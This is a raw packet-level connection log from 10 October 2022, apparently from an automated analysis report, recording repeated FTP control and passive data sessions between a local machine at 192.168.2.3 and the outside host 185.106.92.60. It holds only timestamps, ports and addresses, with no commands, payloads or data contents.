                                                                                                                                    Oct 10, 2022 06:03:37.856367111 CEST2150013185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.856426001 CEST5001321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.856509924 CEST5001321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.879554033 CEST2150013185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.879673958 CEST5001321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.879852057 CEST5001321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.903146029 CEST2150013185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.903247118 CEST5001321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.903409004 CEST5001321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.926327944 CEST2150013185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.926453114 CEST5001321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.926584959 CEST5001321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.949755907 CEST2150013185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.949884892 CEST5001321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.950262070 CEST5001321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.973134995 CEST2150013185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.973259926 CEST5001321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.977044106 CEST5001321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.000317097 CEST2150013185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.000485897 CEST5001321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.001694918 CEST5001464698192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.029772043 CEST6469850014185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.029983997 CEST5001464698192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.030196905 CEST5001321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.054743052 CEST2150013185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.054867029 CEST5001321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.055309057 CEST5001464698192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.081404924 CEST2150013185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.081609011 CEST5001321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.081726074 CEST5001321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.083897114 CEST6469850014185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.084234953 CEST6469850014185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.084352970 CEST5001464698192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.104482889 CEST2150013185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.104573011 CEST2150013185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.104670048 CEST5001321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.238343954 CEST5001521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.263442993 CEST2150015185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.263674021 CEST5001521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.291862011 CEST2150015185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.291941881 CEST5001521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.297105074 CEST2150015185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.297228098 CEST5001521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.297288895 CEST2150015185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.297338963 CEST5001521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.300586939 CEST5001521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.327039003 CEST2150015185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.327316999 CEST5001521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.327855110 CEST5001521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.354835987 CEST2150015185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.354950905 CEST5001521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.355106115 CEST5001521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.379923105 CEST2150015185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.380023003 CEST5001521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.380171061 CEST5001521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.405917883 CEST2150015185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.406075954 CEST5001521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.407299995 CEST5001521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.432708025 CEST2150015185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.432904005 CEST5001521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.435282946 CEST5001521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.461587906 CEST2150015185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.461678982 CEST5001521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.462011099 CEST5001664699192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.487474918 CEST6469950016185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.487628937 CEST5001664699192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.488158941 CEST5001521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.513097048 CEST2150015185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.513350964 CEST5001521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.513998032 CEST5001664699192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.537894964 CEST6469950016185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.538218975 CEST6469950016185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.538374901 CEST5001664699192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.540149927 CEST2150015185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.540306091 CEST5001521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.540414095 CEST5001521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.566973925 CEST2150015185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.567011118 CEST2150015185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.567150116 CEST5001521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.710963011 CEST5001721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.733742952 CEST2150017185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.733939886 CEST5001721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.759934902 CEST2150017185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.759963036 CEST2150017185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.759982109 CEST2150017185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.760059118 CEST5001721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.760361910 CEST5001721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.760361910 CEST5001721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.783324003 CEST2150017185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.786005020 CEST5001721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.786076069 CEST5001721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.809201956 CEST2150017185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.812438011 CEST5001721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.813201904 CEST5001721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.835706949 CEST2150017185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.837929964 CEST5001721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.838181973 CEST5001721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.861136913 CEST2150017185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.862003088 CEST5001721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.862392902 CEST5001721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.885068893 CEST2150017185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.888089895 CEST5001721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.895800114 CEST5001721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.918776989 CEST2150017185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.919141054 CEST5001721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.919445038 CEST5001864700192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.943962097 CEST6470050018185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.944098949 CEST5001864700192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.944662094 CEST5001721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.971126080 CEST2150017185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.972012043 CEST5001721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.973054886 CEST5001864700192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.999226093 CEST6470050018185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.999444008 CEST6470050018185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:38.999866962 CEST5001864700192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:38.999978065 CEST2150017185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.000124931 CEST5001721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.000459909 CEST5001721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.023788929 CEST2150017185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.023874998 CEST2150017185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.024076939 CEST5001721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.136852026 CEST5001921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.160094976 CEST2150019185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.160269976 CEST5001921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.188776016 CEST2150019185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.188862085 CEST2150019185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.188899994 CEST2150019185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.189029932 CEST5001921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.189409018 CEST5001921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.189409018 CEST5001921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.212402105 CEST2150019185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.212467909 CEST5001921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.212620974 CEST5001921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.235799074 CEST2150019185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.236119032 CEST5001921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.236310959 CEST5001921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.259401083 CEST2150019185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.259481907 CEST5001921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.259650946 CEST5001921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.283066988 CEST2150019185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.285967112 CEST5001921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.286361933 CEST5001921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.309462070 CEST2150019185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.309993982 CEST5001921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.316168070 CEST5001921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.341408968 CEST2150019185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.341620922 CEST5001921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.341921091 CEST5002064701192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.364559889 CEST6470150020185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.364769936 CEST5002064701192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.365014076 CEST5001921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.397283077 CEST2150019185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.400001049 CEST5001921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.400552988 CEST5002064701192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.423094988 CEST6470150020185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.423172951 CEST6470150020185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.423402071 CEST5002064701192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.423806906 CEST2150019185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.423886061 CEST5001921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.426031113 CEST5001921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.449024916 CEST2150019185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.449075937 CEST2150019185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.449246883 CEST5001921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.560695887 CEST5002121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.583776951 CEST2150021185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.584110975 CEST5002121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.611112118 CEST2150021185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.611155033 CEST2150021185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.611196995 CEST2150021185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.611337900 CEST5002121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.611519098 CEST5002121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.617261887 CEST5002121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.640618086 CEST2150021185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.642159939 CEST5002121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.647624969 CEST5002121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.671044111 CEST2150021185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.671717882 CEST5002121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.673031092 CEST5002121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.696768999 CEST2150021185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.697108984 CEST5002121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.697177887 CEST5002121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.720844030 CEST2150021185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.721113920 CEST5002121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.721446037 CEST5002121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.744620085 CEST2150021185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.745136023 CEST5002121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.748166084 CEST5002121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.771735907 CEST2150021185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.771833897 CEST5002121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.772095919 CEST5002264702192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.796180964 CEST6470250022185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.796346903 CEST5002264702192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.796684027 CEST5002121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.820732117 CEST2150021185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.821033001 CEST5002121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.821588993 CEST5002264702192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.844595909 CEST6470250022185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.844830990 CEST6470250022185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.844981909 CEST5002264702192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.845333099 CEST2150021185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.845421076 CEST5002121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.852861881 CEST5002121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.875773907 CEST2150021185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.875814915 CEST2150021185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:39.876106024 CEST5002121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:39.995002985 CEST5002321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.020062923 CEST2150023185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.020298004 CEST5002321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.048643112 CEST2150023185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.048672915 CEST2150023185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.048847914 CEST5002321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.050406933 CEST2150023185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.050589085 CEST5002321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.050635099 CEST5002321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.077444077 CEST2150023185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.077747107 CEST5002321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.077967882 CEST5002321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.102761984 CEST2150023185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.102994919 CEST5002321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.103358030 CEST5002321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.127418041 CEST2150023185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.127595901 CEST5002321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.127662897 CEST5002321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.153141975 CEST2150023185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.153340101 CEST5002321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.153732061 CEST5002321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.178349018 CEST2150023185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.178478003 CEST5002321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.184024096 CEST5002321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.208903074 CEST2150023185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.209151030 CEST5002321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.209543943 CEST5002464704192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.234426022 CEST6470450024185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.234617949 CEST5002464704192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.235125065 CEST5002321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.260735989 CEST2150023185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.261044979 CEST5002321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.262063026 CEST5002464704192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.285978079 CEST6470450024185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.286431074 CEST6470450024185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.286562920 CEST5002464704192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.287194967 CEST2150023185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.287322998 CEST5002321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.287523985 CEST5002321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.311883926 CEST2150023185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.311907053 CEST2150023185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.312621117 CEST5002321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.423544884 CEST5002521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.450525999 CEST2150025185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.450916052 CEST5002521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.479099035 CEST2150025185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.479146957 CEST2150025185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.479190111 CEST2150025185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.479362965 CEST5002521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.479432106 CEST5002521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.479897022 CEST5002521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.505265951 CEST2150025185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.505634069 CEST5002521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.507554054 CEST5002521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.533387899 CEST2150025185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.533505917 CEST5002521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.533653975 CEST5002521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.560060024 CEST2150025185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.560287952 CEST5002521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.560381889 CEST5002521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.589191914 CEST2150025185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.589356899 CEST5002521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.589755058 CEST5002521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.617695093 CEST2150025185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.617830992 CEST5002521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.620448112 CEST5002521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.647483110 CEST2150025185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.647650003 CEST5002521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.647855997 CEST5002664705192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.670635939 CEST6470550026185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.670792103 CEST5002664705192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.671046019 CEST5002521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.700783968 CEST2150025185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.701373100 CEST5002521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.702372074 CEST5002664705192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.724879026 CEST6470550026185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.725003004 CEST6470550026185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.725105047 CEST5002664705192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.727305889 CEST2150025185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.727416039 CEST5002521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.728615999 CEST5002521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.757520914 CEST2150025185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.757554054 CEST2150025185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.757674932 CEST5002521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.939901114 CEST5002721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.962971926 CEST2150027185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.963093996 CEST5002721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.989350080 CEST2150027185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.989387035 CEST2150027185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.989408970 CEST2150027185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:40.989415884 CEST5002721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.989439011 CEST5002721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.989455938 CEST5002721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:40.989680052 CEST5002721192.168.2.3185.106.92.60
